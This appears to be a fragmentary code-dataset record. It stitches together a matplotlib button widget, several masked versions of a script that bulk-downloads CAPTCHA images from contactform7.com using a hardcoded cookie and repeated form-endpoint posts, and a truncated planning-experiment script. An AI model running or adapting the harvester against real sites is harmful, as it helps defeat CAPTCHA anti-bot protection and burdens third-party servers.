['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()]*self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n # check inputs are correct\n self.validate_inputs()\n # create buttons\n self.create_buttons()\n\n def validate_inputs(self):\n # Make sure button labels is in correct format\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError(\"Button labels must be a list of strings\")\n # Make sure button actions is in correct format\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError(\"Button labels must be a list of strings\")\n # Make sure button actions is in correct format\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError(\"Button params must be a dictionary\")\n # Make sure list are not empty and same length\n if len(self.button_labels) < 1:\n raise ValueError(\"'button_labels' Must have at least one button \"\n \"label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\"'button_actions' must be the same length \"\n \"as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n # Make sure all button actions are supported\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = \"supported. \\n Currently supported actions are: \\n\"\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = (1. / (b_N + 1)) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n\n # adjust the figure\n plt.subplots_adjust(bottom=0.25)\n # populate buttons\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n\n def next(self, event):\n \"\"\"\n Event for clicking a button with action \"NEXT\"\n \n Sets self.result to 1\n \n :param event: \n :return: \n \"\"\"\n self.result = 1\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval,\n maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue,\n minvalue=minval,\n maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n # get mouse click location in pixels\n x, y = event.x, event.y\n # get the current canvas width and height (in pixels)\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n # loop round each button region\n for r, rn in enumerate(self.regions):\n # convert region to pixels\n rn1 = [rn[0]*width, rn[1]*height,\n (rn[0] + rn[2])*width, (rn[1] + rn[3])*height]\n # test whether x, y are in region\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\n# Main code to test the rectangle selector\nif __name__ == '__main__':\n import numpy as np\n # plt.close()\n # fig, frame = plt.subplots(ncols=1, nrows=1)\n # x = np.random.rand(100)\n # y = np.random.rand(100)\n # plt.scatter(x, y, color='k', marker='o', s=20)\n # odict = dict(close=True)\n # a = Add_Buttons(ax=frame,\n # button_labels=['A', 'B'],\n # button_actions=['OPTION', 'OPTION'],\n # button_params=[odict, odict])\n # plt.show()\n # plt.close()\n\n plt.close()\n fig, frame = plt.subplots(ncols=1, nrows=1)\n x = np.random.rand(100)\n y = np.random.rand(100)\n plt.scatter(x, y, color='k', marker='o', s=20)\n odict = dict(close=True)\n udict = dict(name='x', fmt=int, title='Enter value',\n comment='Please enter x in meters.', minval=4, maxval=10)\n a = Add_Buttons(ax=frame,\n button_labels=['Enter value', 'Close'],\n button_actions=['UINPUT', 'OPTION'],\n button_params=[udict, odict])\n plt.show()\n plt.close()\n\n# =============================================================================\n# End of code\n# =============================================================================\n",
"step-ids": [
6,
8,
9,
10,
13
]
}
|
[
6,
8,
9,
10,
13
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ap.add_argument('-o', '--output', required=True, help='Path to save the images'
)
ap.add_argument('-n', '--number', required=False, default=500, help=
'number of images to download')
<|reserved_special_token_0|>
for j in result:
print('\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
print(j.encode('ascii'))
r = s.get(j.encode('ascii'), headers=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]
)
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
<|reserved_special_token_0|>
while count < args['number']:
try:
s = requests.Session()
result = json.loads(s.post(url, headers=headers).content.decode(
'UTF-8'))
for j in range(3):
print(
'\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
r = s.get(result['captcha'][images[j]].encode('ascii'), headers
=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count
).zfill(5))])
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
except Exception:
print('\x1b[92m Error Downloading Webpage \x1b[00m')
time.sleep(1)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
url = 'https://contactform7.com/captcha/'
headers = {'User-Agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15'
, 'Content-Type':
'multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW',
'Connection': 'keep-alive', 'Cookie':
'lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611'
}
ap = argparse.ArgumentParser()
ap.add_argument('-o', '--output', required=True, help='Path to save the images'
)
ap.add_argument('-n', '--number', required=False, default=500, help=
'number of images to download')
args = vars(ap.parse_args())
s = requests.Session()
result = s.get(url, headers=headers).content.decode('UTF-8')
count = 1
result = re.findall('src="(.*[0-9]{1,}\\.png)"', result)
for j in result:
print('\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
print(j.encode('ascii'))
r = s.get(j.encode('ascii'), headers=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]
)
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
url = (
'https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback'
)
images = ['captcha-118', 'captcha-170', 'captcha-778']
while count < args['number']:
try:
s = requests.Session()
result = json.loads(s.post(url, headers=headers).content.decode(
'UTF-8'))
for j in range(3):
print(
'\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
r = s.get(result['captcha'][images[j]].encode('ascii'), headers
=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count
).zfill(5))])
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
except Exception:
print('\x1b[92m Error Downloading Webpage \x1b[00m')
time.sleep(1)
<|reserved_special_token_1|>
import requests
import re
import time
import os
import argparse
import json
url = 'https://contactform7.com/captcha/'
headers = {'User-Agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15'
, 'Content-Type':
'multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW',
'Connection': 'keep-alive', 'Cookie':
'lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611'
}
ap = argparse.ArgumentParser()
ap.add_argument('-o', '--output', required=True, help='Path to save the images'
)
ap.add_argument('-n', '--number', required=False, default=500, help=
'number of images to download')
args = vars(ap.parse_args())
s = requests.Session()
result = s.get(url, headers=headers).content.decode('UTF-8')
count = 1
result = re.findall('src="(.*[0-9]{1,}\\.png)"', result)
for j in result:
print('\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
print(j.encode('ascii'))
r = s.get(j.encode('ascii'), headers=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]
)
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
url = (
'https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback'
)
images = ['captcha-118', 'captcha-170', 'captcha-778']
while count < args['number']:
try:
s = requests.Session()
result = json.loads(s.post(url, headers=headers).content.decode(
'UTF-8'))
for j in range(3):
print(
'\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
r = s.get(result['captcha'][images[j]].encode('ascii'), headers
=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count
).zfill(5))])
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
except Exception:
print('\x1b[92m Error Downloading Webpage \x1b[00m')
time.sleep(1)
<|reserved_special_token_1|>
import requests
import re
import time
import os
import argparse
import json
url = "https://contactform7.com/captcha/"
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15',
'Content-Type': "multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW","Connection": "keep-alive",
"Cookie": "lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611"
}
ap=argparse.ArgumentParser()
ap.add_argument("-o","--output",required=True,help="Path to save the images")
ap.add_argument("-n","--number",required=False,default=500,help="number of images to download")
args=vars(ap.parse_args())
s=requests.Session()
result = s.get(url, headers=headers).content.decode("UTF-8")
count =1
result = re.findall("src=\"(.*[0-9]{1,}\.png)\"", result)
for j in result:
print("\033[095m Downloading image \033[00m : \033[092m {}/{} \033[00m ".format(count, args["number"]))
print(j.encode("ascii"))
r = s.get(j.encode("ascii"), headers=headers)
p = os.path.sep.join([args["output"], "{}.jpg".format(str(count).zfill(5))])
f = open(p, "wb")
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
url = "https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback"
images=["captcha-118","captcha-170","captcha-778"]
while count<args["number"]:
try:
s = requests.Session()
result = json.loads(s.post(url, headers=headers).content.decode("UTF-8"))
#print(result["captcha"])
#print(result["captcha"][u'captcha-118'].encode("ascii"))
for j in range(3):
print("\033[095m Downloading image \033[00m : \033[092m {}/{} \033[00m ".format(count,args["number"]))
# print(j.encode("ascii"))
r = s.get(result["captcha"][images[j]].encode("ascii"), headers=headers)
p= os.path.sep.join([args["output"],"{}.jpg".format(str(count).zfill(5))])
f=open(p,"wb")
f.write(r.content)
f.close()
time.sleep(0.1)
count+=1
except Exception:
print("\033[92m Error Downloading Webpage \033[00m")
time.sleep(1)
|
flexible
|
{
"blob_id": "6990b5f34af654b4e1a39c3d73b6822fa48e4835",
"index": 9159,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nap.add_argument('-o', '--output', required=True, help='Path to save the images'\n )\nap.add_argument('-n', '--number', required=False, default=500, help=\n 'number of images to download')\n<mask token>\nfor j in result:\n print('\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n print(j.encode('ascii'))\n r = s.get(j.encode('ascii'), headers=headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]\n )\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\n<mask token>\nwhile count < args['number']:\n try:\n s = requests.Session()\n result = json.loads(s.post(url, headers=headers).content.decode(\n 'UTF-8'))\n for j in range(3):\n print(\n '\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n r = s.get(result['captcha'][images[j]].encode('ascii'), headers\n =headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count\n ).zfill(5))])\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\n except Exception:\n print('\\x1b[92m Error Downloading Webpage \\x1b[00m')\n time.sleep(1)\n",
"step-3": "<mask token>\nurl = 'https://contactform7.com/captcha/'\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15'\n , 'Content-Type':\n 'multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW',\n 'Connection': 'keep-alive', 'Cookie':\n 'lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611'\n }\nap = argparse.ArgumentParser()\nap.add_argument('-o', '--output', required=True, help='Path to save the images'\n )\nap.add_argument('-n', '--number', required=False, default=500, help=\n 'number of images to download')\nargs = vars(ap.parse_args())\ns = requests.Session()\nresult = s.get(url, headers=headers).content.decode('UTF-8')\ncount = 1\nresult = re.findall('src=\"(.*[0-9]{1,}\\\\.png)\"', result)\nfor j in result:\n print('\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n print(j.encode('ascii'))\n r = s.get(j.encode('ascii'), headers=headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]\n )\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\nurl = (\n 'https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback'\n )\nimages = ['captcha-118', 'captcha-170', 'captcha-778']\nwhile count < args['number']:\n try:\n s = requests.Session()\n result = json.loads(s.post(url, headers=headers).content.decode(\n 'UTF-8'))\n for j in range(3):\n print(\n '\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n r = s.get(result['captcha'][images[j]].encode('ascii'), headers\n =headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count\n ).zfill(5))])\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\n except Exception:\n print('\\x1b[92m Error Downloading Webpage \\x1b[00m')\n time.sleep(1)\n",
"step-4": "import requests\nimport re\nimport time\nimport os\nimport argparse\nimport json\nurl = 'https://contactform7.com/captcha/'\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15'\n , 'Content-Type':\n 'multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW',\n 'Connection': 'keep-alive', 'Cookie':\n 'lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611'\n }\nap = argparse.ArgumentParser()\nap.add_argument('-o', '--output', required=True, help='Path to save the images'\n )\nap.add_argument('-n', '--number', required=False, default=500, help=\n 'number of images to download')\nargs = vars(ap.parse_args())\ns = requests.Session()\nresult = s.get(url, headers=headers).content.decode('UTF-8')\ncount = 1\nresult = re.findall('src=\"(.*[0-9]{1,}\\\\.png)\"', result)\nfor j in result:\n print('\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n print(j.encode('ascii'))\n r = s.get(j.encode('ascii'), headers=headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]\n )\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\nurl = (\n 'https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback'\n )\nimages = ['captcha-118', 'captcha-170', 'captcha-778']\nwhile count < args['number']:\n try:\n s = requests.Session()\n result = json.loads(s.post(url, headers=headers).content.decode(\n 'UTF-8'))\n for j in range(3):\n print(\n '\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n r = s.get(result['captcha'][images[j]].encode('ascii'), headers\n =headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count\n ).zfill(5))])\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\n except Exception:\n print('\\x1b[92m Error Downloading Webpage \\x1b[00m')\n time.sleep(1)\n",
"step-5": "import requests\nimport re\nimport time\nimport os\nimport argparse\nimport json\n\nurl = \"https://contactform7.com/captcha/\"\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15',\n 'Content-Type': \"multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW\",\"Connection\": \"keep-alive\",\n \"Cookie\": \"lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611\"\n}\n\nap=argparse.ArgumentParser()\nap.add_argument(\"-o\",\"--output\",required=True,help=\"Path to save the images\")\nap.add_argument(\"-n\",\"--number\",required=False,default=500,help=\"number of images to download\")\nargs=vars(ap.parse_args())\ns=requests.Session()\nresult = s.get(url, headers=headers).content.decode(\"UTF-8\")\n\ncount =1\nresult = re.findall(\"src=\\\"(.*[0-9]{1,}\\.png)\\\"\", result)\nfor j in result:\n print(\"\\033[095m Downloading image \\033[00m : \\033[092m {}/{} \\033[00m \".format(count, args[\"number\"]))\n print(j.encode(\"ascii\"))\n r = s.get(j.encode(\"ascii\"), headers=headers)\n p = os.path.sep.join([args[\"output\"], \"{}.jpg\".format(str(count).zfill(5))])\n f = open(p, \"wb\")\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\n\nurl = \"https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback\"\nimages=[\"captcha-118\",\"captcha-170\",\"captcha-778\"]\nwhile count<args[\"number\"]:\n try:\n s = requests.Session()\n result = json.loads(s.post(url, headers=headers).content.decode(\"UTF-8\"))\n #print(result[\"captcha\"])\n #print(result[\"captcha\"][u'captcha-118'].encode(\"ascii\"))\n\n for j in range(3):\n print(\"\\033[095m Downloading image \\033[00m : \\033[092m {}/{} \\033[00m \".format(count,args[\"number\"]))\n # print(j.encode(\"ascii\"))\n r = s.get(result[\"captcha\"][images[j]].encode(\"ascii\"), headers=headers)\n p= os.path.sep.join([args[\"output\"],\"{}.jpg\".format(str(count).zfill(5))])\n f=open(p,\"wb\")\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count+=1\n\n except Exception:\n print(\"\\033[92m Error Downloading Webpage \\033[00m\")\n time.sleep(1)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import logging
import os
from os.path import exists, abspath, join, dirname
from os import mkdir
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["MP_NUM_THREADS"] = "1"
from smallab.runner_implementations.multiprocessing_runner import MultiprocessingRunner
from plannin_experiment import PlanningExperiment
mpl_logger = logging.getLogger('matplotlib')
mpl_logger.setLevel(logging.WARNING)
logging.getLogger("smallab").propogate = False
from smallab.specification_generator import SpecificationGenerator
from smallab.runner.runner import ExperimentRunner
from smallab.runner_implementations.main_process_runner import MainRunner
from itertools import product
from sample_sim.memory_mapper_utility import map_memory
from smallab.file_locations import get_experiment_save_directory
import sys
import numpy as np
if __name__ == '__main__':
if "experiments" in os.getcwd():
os.chdir("../..")
this_dir = dirname(abspath(__file__))
for dir_name in ('.cache', '.params'):
path = join(this_dir, dir_name)
if not exists(path):
mkdir(path)
if len(sys.argv) > 1:
name = sys.argv[1]
else:
name = "IPP_POMCP"
num_seeds = 5
num_steps = 200
base_specs = {
"plot": False,
"file": ["fn:sbo"],
"seed": list(range(num_seeds)),
"objective_c": 10, # 10 for sbo, 100 for validation envs
"state_space_dimensionality": [[50,50,200]], # for fn:sbo, [[62, 70, 5]], # for validation envs
"rollout_number_goal": [num_steps * 150], # z_steps * 150
"alpha_param": 6,
"beta_param": 1,
"epsilon": 10,
"delta": 0.1,
"sample_observations": False,
"use_expected_improvement": False,
"planning_steps": [num_steps],
}
gen_baseline = base_specs.copy()
gen_baseline.update({
"plan_commitment_algorithm": "n_steps",
"plan_threshold": [1],
"rollout_allocation_method": ["fixed"],
"waste_unused_rollouts": [False],
})
specs_baseline = SpecificationGenerator().generate(gen_baseline)
gen_our_best = base_specs.copy()
gen_our_best.update({
"plan_commitment_algorithm":"tTest",
"plan_threshold":[0.05],
"rollout_allocation_method": ["beta-ugapeb"],
"waste_unused_rollouts": [True],
})
specs_our_best = SpecificationGenerator().generate(gen_our_best)
specifications = []
specifications += specs_baseline
specifications += specs_our_best
print(f"Expt {name}:\t{len(specifications)/num_seeds} specs to run, over {num_seeds} seeds")
for spec in specifications:
if spec["seed"] == 0:
print(spec)
runner = ExperimentRunner()
map_memory(base_specs["file"], base_specs["state_space_dimensionality"])
DEBUG = False
if DEBUG:
runner.run(name, specifications, PlanningExperiment(), propagate_exceptions=True,
specification_runner=MainRunner(), use_dashboard=False, force_pickle=True, context_type="fork")
else:
gpus = 4
jobs_per_gpu = 2
resources = list(product(list(range(gpus)), list(range(jobs_per_gpu))))
runner.run(name, specifications, PlanningExperiment(), propagate_exceptions=False,
specification_runner=MultiprocessingRunner(), context_type="fork", use_dashboard=True,
force_pickle=True)
|
normal
|
{
"blob_id": "88d8d04dd7117daed0e976f3abc52c5d7bf18434",
"index": 9334,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nmpl_logger.setLevel(logging.WARNING)\n<mask token>\nif __name__ == '__main__':\n if 'experiments' in os.getcwd():\n os.chdir('../..')\n this_dir = dirname(abspath(__file__))\n for dir_name in ('.cache', '.params'):\n path = join(this_dir, dir_name)\n if not exists(path):\n mkdir(path)\n if len(sys.argv) > 1:\n name = sys.argv[1]\n else:\n name = 'IPP_POMCP'\n num_seeds = 5\n num_steps = 200\n base_specs = {'plot': False, 'file': ['fn:sbo'], 'seed': list(range(\n num_seeds)), 'objective_c': 10, 'state_space_dimensionality': [[50,\n 50, 200]], 'rollout_number_goal': [num_steps * 150], 'alpha_param':\n 6, 'beta_param': 1, 'epsilon': 10, 'delta': 0.1,\n 'sample_observations': False, 'use_expected_improvement': False,\n 'planning_steps': [num_steps]}\n gen_baseline = base_specs.copy()\n gen_baseline.update({'plan_commitment_algorithm': 'n_steps',\n 'plan_threshold': [1], 'rollout_allocation_method': ['fixed'],\n 'waste_unused_rollouts': [False]})\n specs_baseline = SpecificationGenerator().generate(gen_baseline)\n gen_our_best = base_specs.copy()\n gen_our_best.update({'plan_commitment_algorithm': 'tTest',\n 'plan_threshold': [0.05], 'rollout_allocation_method': [\n 'beta-ugapeb'], 'waste_unused_rollouts': [True]})\n specs_our_best = SpecificationGenerator().generate(gen_our_best)\n specifications = []\n specifications += specs_baseline\n specifications += specs_our_best\n print(\n f'Expt {name}:\\t{len(specifications) / num_seeds} specs to run, over {num_seeds} seeds'\n )\n for spec in specifications:\n if spec['seed'] == 0:\n print(spec)\n runner = ExperimentRunner()\n map_memory(base_specs['file'], base_specs['state_space_dimensionality'])\n DEBUG = False\n if DEBUG:\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=True, specification_runner=MainRunner(),\n use_dashboard=False, force_pickle=True, context_type='fork')\n else:\n gpus = 4\n jobs_per_gpu = 2\n resources = list(product(list(range(gpus)), list(range(jobs_per_gpu))))\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=False, specification_runner=\n MultiprocessingRunner(), context_type='fork', use_dashboard=\n True, force_pickle=True)\n",
"step-3": "<mask token>\nos.environ['MKL_NUM_THREADS'] = '1'\nos.environ['MP_NUM_THREADS'] = '1'\n<mask token>\nmpl_logger = logging.getLogger('matplotlib')\nmpl_logger.setLevel(logging.WARNING)\nlogging.getLogger('smallab').propogate = False\n<mask token>\nif __name__ == '__main__':\n if 'experiments' in os.getcwd():\n os.chdir('../..')\n this_dir = dirname(abspath(__file__))\n for dir_name in ('.cache', '.params'):\n path = join(this_dir, dir_name)\n if not exists(path):\n mkdir(path)\n if len(sys.argv) > 1:\n name = sys.argv[1]\n else:\n name = 'IPP_POMCP'\n num_seeds = 5\n num_steps = 200\n base_specs = {'plot': False, 'file': ['fn:sbo'], 'seed': list(range(\n num_seeds)), 'objective_c': 10, 'state_space_dimensionality': [[50,\n 50, 200]], 'rollout_number_goal': [num_steps * 150], 'alpha_param':\n 6, 'beta_param': 1, 'epsilon': 10, 'delta': 0.1,\n 'sample_observations': False, 'use_expected_improvement': False,\n 'planning_steps': [num_steps]}\n gen_baseline = base_specs.copy()\n gen_baseline.update({'plan_commitment_algorithm': 'n_steps',\n 'plan_threshold': [1], 'rollout_allocation_method': ['fixed'],\n 'waste_unused_rollouts': [False]})\n specs_baseline = SpecificationGenerator().generate(gen_baseline)\n gen_our_best = base_specs.copy()\n gen_our_best.update({'plan_commitment_algorithm': 'tTest',\n 'plan_threshold': [0.05], 'rollout_allocation_method': [\n 'beta-ugapeb'], 'waste_unused_rollouts': [True]})\n specs_our_best = SpecificationGenerator().generate(gen_our_best)\n specifications = []\n specifications += specs_baseline\n specifications += specs_our_best\n print(\n f'Expt {name}:\\t{len(specifications) / num_seeds} specs to run, over {num_seeds} seeds'\n )\n for spec in specifications:\n if spec['seed'] == 0:\n print(spec)\n runner = ExperimentRunner()\n map_memory(base_specs['file'], base_specs['state_space_dimensionality'])\n DEBUG = False\n if DEBUG:\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=True, specification_runner=MainRunner(),\n use_dashboard=False, force_pickle=True, context_type='fork')\n else:\n gpus = 4\n jobs_per_gpu = 2\n resources = list(product(list(range(gpus)), list(range(jobs_per_gpu))))\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=False, specification_runner=\n MultiprocessingRunner(), context_type='fork', use_dashboard=\n True, force_pickle=True)\n",
"step-4": "import logging\nimport os\nfrom os.path import exists, abspath, join, dirname\nfrom os import mkdir\nos.environ['MKL_NUM_THREADS'] = '1'\nos.environ['MP_NUM_THREADS'] = '1'\nfrom smallab.runner_implementations.multiprocessing_runner import MultiprocessingRunner\nfrom plannin_experiment import PlanningExperiment\nmpl_logger = logging.getLogger('matplotlib')\nmpl_logger.setLevel(logging.WARNING)\nlogging.getLogger('smallab').propogate = False\nfrom smallab.specification_generator import SpecificationGenerator\nfrom smallab.runner.runner import ExperimentRunner\nfrom smallab.runner_implementations.main_process_runner import MainRunner\nfrom itertools import product\nfrom sample_sim.memory_mapper_utility import map_memory\nfrom smallab.file_locations import get_experiment_save_directory\nimport sys\nimport numpy as np\nif __name__ == '__main__':\n if 'experiments' in os.getcwd():\n os.chdir('../..')\n this_dir = dirname(abspath(__file__))\n for dir_name in ('.cache', '.params'):\n path = join(this_dir, dir_name)\n if not exists(path):\n mkdir(path)\n if len(sys.argv) > 1:\n name = sys.argv[1]\n else:\n name = 'IPP_POMCP'\n num_seeds = 5\n num_steps = 200\n base_specs = {'plot': False, 'file': ['fn:sbo'], 'seed': list(range(\n num_seeds)), 'objective_c': 10, 'state_space_dimensionality': [[50,\n 50, 200]], 'rollout_number_goal': [num_steps * 150], 'alpha_param':\n 6, 'beta_param': 1, 'epsilon': 10, 'delta': 0.1,\n 'sample_observations': False, 'use_expected_improvement': False,\n 'planning_steps': [num_steps]}\n gen_baseline = base_specs.copy()\n gen_baseline.update({'plan_commitment_algorithm': 'n_steps',\n 'plan_threshold': [1], 'rollout_allocation_method': ['fixed'],\n 'waste_unused_rollouts': [False]})\n specs_baseline = SpecificationGenerator().generate(gen_baseline)\n gen_our_best = base_specs.copy()\n gen_our_best.update({'plan_commitment_algorithm': 'tTest',\n 'plan_threshold': [0.05], 'rollout_allocation_method': [\n 'beta-ugapeb'], 'waste_unused_rollouts': [True]})\n specs_our_best = 